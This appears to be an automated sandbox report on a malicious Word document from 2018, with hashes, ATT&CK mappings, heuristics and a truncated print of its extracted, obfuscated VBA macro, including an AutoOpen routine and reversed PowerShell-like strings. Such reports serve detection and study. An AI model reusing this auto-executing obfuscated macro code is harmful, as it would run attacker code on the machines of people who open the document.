Office (OLE) malware analysis — malicious · 06362e2fe491c943

MALICIOUS

Office (OLE)

166.5 KB Created: 2018-05-19 06:52:00 Authoring application: Microsoft Office Word First seen: 2018-06-30

MD5: 84b4aac3f586303f283b806cc0b8de22 SHA-1: 8a8d16763797f4f3f9d97ec672582191d7ae2549 SHA-256: 06362e2fe491c9439a9169ee88b2c5f0988eb2f35ee329b648bf7b53794b4f48

142 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is a Microsoft Office document containing VBA macros. The critical heuristic firing indicates a Shell() call within the VBA code, and the presence of an AutoOpen macro suggests it executes automatically upon opening. This functionality is commonly used to download and execute further malicious content.

Heuristics 5

VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 162720 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	162720 bytes
SHA-256: `a3029b90fd52697b1cb4ba240aba0a1394bac8618e787637f8370a6cbea922d6`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "MjIrJEAvfpYopY" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub knhzz(QQRTR) For IaXiP = 76898 To 86553 For wbZoYF = 92690 To FYaHz jUdIBY = ChrB(GkSzw) Next DMjCJ = 82501 * 24271 IOtbt = ELssJG + qCAGm Next End Sub Sub ZsrGo(jszYVR) For kobGk = 65142 To 15037 For LusZpr = 14656 To KfvWW KRHFBN = ChrB(FmXbtV) Next PwPZiY = 25764 * 95470 hziYjp = ZuuzdJ + fjuNGH Next For wwWiw = 26582 To 30731 For swZMS = 50231 To SoCQu jwYzFz = ChrB(skLHpd) Next CLujbc = 6018 * 4400 XRqYZO = KpNXR + wirQfi Next For mSXoq = 6804 To 13257 For TpRuiC = 606 To PYLiiB bGREN = ChrB(sKzYu) Next EuBhV = 13741 * 23142 Awdmwz = crTAil + viZzt Next End Sub Sub aiTVks(oNqpXS) For QfciI = 30233 To 37643 For TdYPY = 7116 To TIWNhQ cICDC = ChrB(OAddM) Next kPGuqd = 20456 * 20187 qzUUr = uiTJku + CUcENL Next For SzvDw = 37054 To 67596 For OfkXF = 22139 To LhjKRU KTbhq = ChrB(lRmQw) Next sqBRX = 46868 * 12629 TnYNoi = JuUCu + zpbbPd Next End Sub Sub Autoopen() On Error Resume Next For bztUY = 93289 To 36463 For JQMmLn = 99122 To vOtHw WROEcs = ChrB(apIvk) Next VtEor = 30679 * 38178 iIPis = RjMWW + wacFT Next fisRJWlMcEjPWd (ZvjbE + FwZHonrX + ahdiqa) For rcbsI = 97621 To 41981 For sjucmY = 20795 To vQwUX YRCEYH = ChrB(WnpmV) Next wWiUGw = 69860 * 63406 owSSQ = iNrFdB + KpEaO Next End Sub Sub WwEqR(OkMwsW) For JMcEmF = 83828 To 71736 For Zwjrds = 23270 To PjkMKP IAYCpW = ChrB(zjpsr) Next kRVWmi = 44489 * 12588 ZQVYT = Lmbwzr + ljpvRH Next For wClBdI = 96481 To 21110 For Zbsdz = 53555 To jRCln Ottqoj = ChrB(jrQPIN) Next iUuLi = 1556 * 47695 XFOwJ = JdPWK + osHmTR Next For jhKcV = 70367 To 9888 For LXrDmY = 23113 To ncqWP NBtzN = ChrB(mNHrQi) Next UMdsNE = 89381 * 95109 XSXbc = TKduG + TIjYW Next End Sub Sub rwPAm(jrJKk) For SVaHia = 48848 To 73479 For QtzOV = 44946 To ADtTqh wrXfP = ChrB(kLIaAc) Next iMiIzk = 32380 * 52659 RmRlw = GRQlkS + QHuKqV Next End Sub Attribute VB_Name = "kXNslAn" Sub kUGQb(ZlOdws) For rKPrS = 13830 To 92129 For OotvW = 38799 To YYzwDh vfTrhq = ChrB(jjscz) Next NwBTtr = 3663 * 43248 MVEZjM = iBoYKO + XbZFBi Next End Sub Function FwZHonrX() On Error Resume Next For BSXaj = 51153 To 45662 For DLfJPT = 97166 To IKJqCq aiwOdr = ChrB(mAoYL) Next jwzlR = 96039 * 97590 tBzPZo = urrFK + zrhLuo Next For EmzXc = 48864 To 77983 For dJrmcS = 82942 To oApXSG jocYt = ChrB(frzrta) Next VzCuU = 89204 * 33553 jFUOH = zkqOs + ZOjABv Next jqovsNpGKI = VtoruX("I%e7HtesecAlpeRC- 69]rAHc['+',tesi9Ctes EcaLper- 93]rAHc[,tesJbetesEcaLper- 43]rAHc[,tesYgBtes EcaLper- )tes}tes+tes}{htes+tesctes+teWbiFX", 21583 + 6 - 21583, 21583 + 133 - 21583) For wRuuj = 83736 To 76760 For ozuDY = 78182 To AiIJl jGGcA = ChrB(dHPCtY) Next SroKkW = 37587 * 97559 nwLUK = OArrJ + SLnRiP Next For tdzqlq = 93704 To 46193 For EnXszJ = 11607 To aIvRJ dswwZ = ChrB(wLROPJ) Next FbYtC = 83383 * 1528 smmVV = HKSTT + KUwnrX Next VsjWP = VtoruX("0fziRmohSP$ ( . \|)63]RAhc[,'gQh' EcaLPErC-93]RAhc[,)611]RAhc[+101]RAhc[+511]RAhc[( EcaLPErC-)'))63]rAHc[,)07]rAHc[+58]rAHc[+45]rAHc[(EcaLper-2'+'9]rAHc[,tesz", 20105 + 2 - 20105, 20105 + 152 - 20105) For isWJcq = 79999 To 1103 For BOsZJC = 71744 To LcEir wuwZJ = ChrB(ckBfBW) Next VdJif = 4919 * 26051 ... (truncated)

SHA-256: a3029b90fd52697b1cb4ba240aba0a1394bac8618e787637f8370a6cbea922d6

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "MjIrJEAvfpYopY"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub knhzz(QQRTR)
For IaXiP = 76898 To 86553
      For wbZoYF = 92690 To FYaHz
         jUdIBY = ChrB(GkSzw)
      Next
      DMjCJ = 82501 * 24271
      IOtbt = ELssJG + qCAGm
Next
End Sub
Sub ZsrGo(jszYVR)
For kobGk = 65142 To 15037
      For LusZpr = 14656 To KfvWW
         KRHFBN = ChrB(FmXbtV)
      Next
      PwPZiY = 25764 * 95470
      hziYjp = ZuuzdJ + fjuNGH
Next
For wwWiw = 26582 To 30731
      For swZMS = 50231 To SoCQu
         jwYzFz = ChrB(skLHpd)
      Next
      CLujbc = 6018 * 4400
      XRqYZO = KpNXR + wirQfi
Next
For mSXoq = 6804 To 13257
      For TpRuiC = 606 To PYLiiB
         bGREN = ChrB(sKzYu)
      Next
      EuBhV = 13741 * 23142
      Awdmwz = crTAil + viZzt
Next
End Sub
Sub aiTVks(oNqpXS)
For QfciI = 30233 To 37643
      For TdYPY = 7116 To TIWNhQ
         cICDC = ChrB(OAddM)
      Next
      kPGuqd = 20456 * 20187
      qzUUr = uiTJku + CUcENL
Next
For SzvDw = 37054 To 67596
      For OfkXF = 22139 To LhjKRU
         KTbhq = ChrB(lRmQw)
      Next
      sqBRX = 46868 * 12629
      TnYNoi = JuUCu + zpbbPd
Next
End Sub
Sub Autoopen()
On Error Resume Next
For bztUY = 93289 To 36463
      For JQMmLn = 99122 To vOtHw
         WROEcs = ChrB(apIvk)
      Next
      VtEor = 30679 * 38178
      iIPis = RjMWW + wacFT
Next
fisRJWlMcEjPWd (ZvjbE + FwZHonrX + ahdiqa)
For rcbsI = 97621 To 41981
      For sjucmY = 20795 To vQwUX
         YRCEYH = ChrB(WnpmV)
      Next
      wWiUGw = 69860 * 63406
      owSSQ = iNrFdB + KpEaO
Next
End Sub
Sub WwEqR(OkMwsW)
For JMcEmF = 83828 To 71736
      For Zwjrds = 23270 To PjkMKP
         IAYCpW = ChrB(zjpsr)
      Next
      kRVWmi = 44489 * 12588
      ZQVYT = Lmbwzr + ljpvRH
Next
For wClBdI = 96481 To 21110
      For Zbsdz = 53555 To jRCln
         Ottqoj = ChrB(jrQPIN)
      Next
      iUuLi = 1556 * 47695
      XFOwJ = JdPWK + osHmTR
Next
For jhKcV = 70367 To 9888
      For LXrDmY = 23113 To ncqWP
         NBtzN = ChrB(mNHrQi)
      Next
      UMdsNE = 89381 * 95109
      XSXbc = TKduG + TIjYW
Next
End Sub
Sub rwPAm(jrJKk)
For SVaHia = 48848 To 73479
      For QtzOV = 44946 To ADtTqh
         wrXfP = ChrB(kLIaAc)
      Next
      iMiIzk = 32380 * 52659
      RmRlw = GRQlkS + QHuKqV
Next
End Sub

Attribute VB_Name = "kXNslAn"
Sub kUGQb(ZlOdws)
For rKPrS = 13830 To 92129
      For OotvW = 38799 To YYzwDh
         vfTrhq = ChrB(jjscz)
      Next
      NwBTtr = 3663 * 43248
      MVEZjM = iBoYKO + XbZFBi
Next
End Sub
Function FwZHonrX()
On Error Resume Next
For BSXaj = 51153 To 45662
      For DLfJPT = 97166 To IKJqCq
         aiwOdr = ChrB(mAoYL)
      Next
      jwzlR = 96039 * 97590
      tBzPZo = urrFK + zrhLuo
Next
For EmzXc = 48864 To 77983
      For dJrmcS = 82942 To oApXSG
         jocYt = ChrB(frzrta)
      Next
      VzCuU = 89204 * 33553
      jFUOH = zkqOs + ZOjABv
Next
jqovsNpGKI = VtoruX("I%e7HtesecAlpeRC- 69]rAHc['+',tesi9Ctes EcaLper- 93]rAHc[,tesJbetesEcaLper- 43]rAHc[,tesYgBtes  EcaLper-  )tes}tes+tes}{htes+tesctes+teWbiFX", 21583 + 6 - 21583, 21583 + 133 - 21583)
For wRuuj = 83736 To 76760
      For ozuDY = 78182 To AiIJl
         jGGcA = ChrB(dHPCtY)
      Next
      SroKkW = 37587 * 97559
      nwLUK = OArrJ + SLnRiP
Next
For tdzqlq = 93704 To 46193
      For EnXszJ = 11607 To aIvRJ
         dswwZ = ChrB(wLROPJ)
      Next
      FbYtC = 83383 * 1528
      smmVV = HKSTT + KUwnrX
Next
VsjWP = VtoruX("0fziRmohSP$ ( . |)63]RAhc[,'gQh' EcaLPErC-93]RAhc[,)611]RAhc[+101]RAhc[+511]RAhc[(  EcaLPErC-)'))63]rAHc[,)07]rAHc[+58]rAHc[+45]rAHc[(EcaLper-2'+'9]rAHc[,tesz", 20105 + 2 - 20105, 20105 + 152 - 20105)
For isWJcq = 79999 To 1103
      For BOsZJC = 71744 To LcEir
         wuwZJ = ChrB(ckBfBW)
      Next
      VdJif = 4919 * 26051
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.